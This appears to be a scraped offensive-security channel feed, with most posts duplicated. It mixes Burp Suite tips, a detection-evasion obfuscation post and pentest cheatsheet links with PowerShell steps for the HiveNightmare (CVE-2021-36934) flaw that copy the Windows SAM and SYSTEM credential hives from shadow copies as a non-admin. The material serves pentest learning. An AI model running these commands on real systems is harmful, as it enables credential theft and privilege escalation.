APT
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves…
WINDOWS LPE "HiveNightmare" or "SeriousSAM"
1) Check permissions:
3) Copy SAM and SYSTEM files from shadow copy:
CVE-2021-36934
The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.1) Check permissions:
icacls.exe C:\Windows\System32\config\SAM
2) Check shadow copies, restore points[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')
... and so on3) Copy SAM and SYSTEM files from shadow copy:
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')#BurpHacksForBounties - Tip 20/30
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
#BurpHacksForBounties - Day 21/30
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model.
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
2/n
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
3/n
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
portswigger.net
Burp Collaborator - PortSwigger
Burp Collaborator is a network service that enables you to detect invisible vulnerabilities. These are vulnerabilities that don't: Trigger error messages. ...
Cheat sheet when designing offensive code
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon
Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
www.wietzebeukema.nl
Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due…
#BurpHacksForBounties - Day 22/30
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
1/n [JAVA]
- Download API interfaces from Burp -> Extender -> APIs -> Save Interface files.
- Create a package name burp and save files there, you can choose any IDE of your choice.
- Make IDE ready to build JAR.
- Create file name BurpExtender and add the following code.
- Download API interfaces from Burp -> Extender -> APIs -> Save Interface files.
- Create a package name burp and save files there, you can choose any IDE of your choice.
- Make IDE ready to build JAR.
- Create file name BurpExtender and add the following code.
2/n
- File name Burp Extender will be an entry point for your plugin, Extending interface registers this in Burp on loading. All logic for the plugin goes here.
- Build Jar
- Load Jar in Burp.
- File name Burp Extender will be an entry point for your plugin, Extending interface registers this in Burp on loading. All logic for the plugin goes here.
- Build Jar
- Load Jar in Burp.
3/n
- You can also build Jar from the command line with these commands.
Code location -> cd usercode
loc for *.class files -> mkdir build
location for jar -> mkdir bin
Compile code -> javac -d build src/burp/*.java
Build Jar -> jar cf bin/burpextender.jar -C build burp
- You can also build Jar from the command line with these commands.
Code location -> cd usercode
loc for *.class files -> mkdir build
location for jar -> mkdir bin
Compile code -> javac -d build src/burp/*.java
Build Jar -> jar cf bin/burpextender.jar -C build burp
OFFENSIVE SECURITY CHEATSHEET
— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources
https://cheatsheet.haax.fr/
#cheatsheet #pentest #osint #ad
— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources
https://cheatsheet.haax.fr/
#cheatsheet #pentest #osint #ad
Top 25 Penetration Testing Skills and Competencies (Detailed)
What soft skills and technical competencies does it take to became a professional penetration tester or ethical hacker? In this article we will discuss in detail what are the top 25 areas every pentester should be familiar with and what skills you should focus on if you want to become a professional penetration tester.
https://www.infosecmatter.com/top-25-penetration-testing-skills-and-competencies-detailed/
#pentest #skills
What soft skills and technical competencies does it take to became a professional penetration tester or ethical hacker? In this article we will discuss in detail what are the top 25 areas every pentester should be familiar with and what skills you should focus on if you want to become a professional penetration tester.
https://www.infosecmatter.com/top-25-penetration-testing-skills-and-competencies-detailed/
#pentest #skills
InfosecMatter
Top 25 Penetration Testing Skills and Competencies (Detailed) - InfosecMatter
List of 25 penetration testing skills every professional penetration tester or ethical hacker should have. Also applicable to red teamers and security auditors.